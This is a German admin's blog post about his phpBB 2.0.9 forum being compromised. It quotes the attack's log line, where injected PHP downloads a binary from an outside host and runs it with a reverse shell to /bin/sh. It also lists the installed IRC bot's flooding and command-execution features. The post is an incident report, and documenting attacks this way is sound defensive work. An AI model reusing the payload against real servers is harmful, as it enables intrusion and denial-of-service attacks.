Heute kam es zu einer nigga-Attacke.
Ich habe das Problem behoben und die Forensoftware aktualisiert, sollte ich wirklich häufiger machen.
phpbb.com
Di. 24-05-05
nigga-attacke
Bei der täglichen Kontrolle meines root-servers viel mir ein Prozess .sesss_
auf, der sehr viel CPU-Last erzeugte.
Der Prozess lief als Webserver User, so dass ich mich auf die Suche machte und doch in kurzer Zeit den Äbeltäter ausfindig gemacht habe.
Installiert wurde der ungewünschte Gast durch einen HTTP Aufruf des adminteils vom phpBB2 Forum.
meine alte Version 2.0.9 war für einen solchen Angriff anfällig.
der Eintrag im Apache-LOG sieht so aus:
- - [24/May/2005:12:43:05 +0000] "GET /phpBB2/admin/admin_styles.php?mode=addnew&\
install_to=../../../../../../../../../../../../../../../../../../../tmp&\
sid=139b923e3ebc85963aadca59e785945e&niggaip=35235&niggaport=25225\
&nigga=$a=fopen(\"http://ads.stage.co.il/.lol/lol\",\"r\");$b=\"\"\
;while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=\
fopen(\"/tmp/.sesss_\",\"w\");fwrite($a,$b);fclose($a);chmod(\"/tmp/.sesss_\",0777);\
system(\"/tmp/.sesss_%20\".$_REQUEST[niggaip].\"%20\".\
$_REQUEST[niggaport].\"%20-e%20/bin/sh\"); HTTP/1.1" 200 - \
"http://213-146-167-58.kunde.vdserver.de/phpBB2/"\
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Der Lesbarkeit halber, habe ich die Zeile umgebrochen, es ist natürlich eine einzige.
Wie man unschwer erkennen kann, wird von einem anderen (wahrscheinlich ebenfalls erfolgreich attackierten) Server ads.stage.co.il
eine Datei namens lol als .sesss_ herunterladen und gestartet.
Das Programm ist ein ganz besonders netter Geselle.
guckst du hier:
Enabled and awaiting orders
NOTICE %s :Current status is: %s.
NOTICE %s :Already disabled.
NOTICE %s :Password too long! > 254
NOTICE %s :Disable sucessful.
NOTICE %s :ENABLE <pass>
NOTICE %s :Already enabled.
NOTICE %s :Wrong password
NOTICE %s :Password correct.
NOTICE %s :Removed all spoofs
NOTICE %s :What kind of subnet address is that? Do something like: 169.40
NOTICE %s :Unable to resolve %s
NOTICE %s :UDP <target> <port> <secs>
NOTICE %s :Packeting %s.
NOTICE %s :PAN <target> <port> <secs>
NOTICE %s :Panning %s.
NOTICE %s :TSUNAMI <target> <secs>
NOTICE %s :Tsunami heading for %s.
NOTICE %s :UNKNOWN <target> <secs>
NOTICE %s :Unknowning %s.
NOTICE %s :MOVE <server>
NOTICE %s :TSUNAMI <target> <secs> = Special packeter that wont be blocked by most firewalls
NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers
NOTICE %s :UDP <target> <port> <secs> = A udp flooder
NOTICE %s :UNKNOWN <target> <secs> = Another non-spoof udp flooder
NOTICE %s :NICK <nick> = Changes the nick of the client
NOTICE %s :SERVER <server> = Changes servers
NOTICE %s :GETSPOOFS = Gets the current spoofing
NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet
NOTICE %s :DISABLE = Disables all packeting from this client
NOTICE %s :ENABLE = Enables all packeting from this client
NOTICE %s :KILL = Kills the client
NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd
NOTICE %s :VERSION = Requests version of client
NOTICE %s :KILLALL = Kills all current packeting
NOTICE %s :HELP = Displays this
NOTICE %s :IRC <command> = Sends this command to the server
NOTICE %s :SH <command> = Executes a command
NOTICE %s :Killing pid %d.
Soweit der Ausschnitt der verstandenen Befehle, weiterhin findet man dns-namen von mehreren Servern in nuManchmal hätte ich nicht übel Lust Anzeige zu erstatten, aber bringen wirds vermutlich nichts.
Hoffentlich taucht Zockertown nun in keinem Log irgendwo auf der Welt als DOS-Attacker auf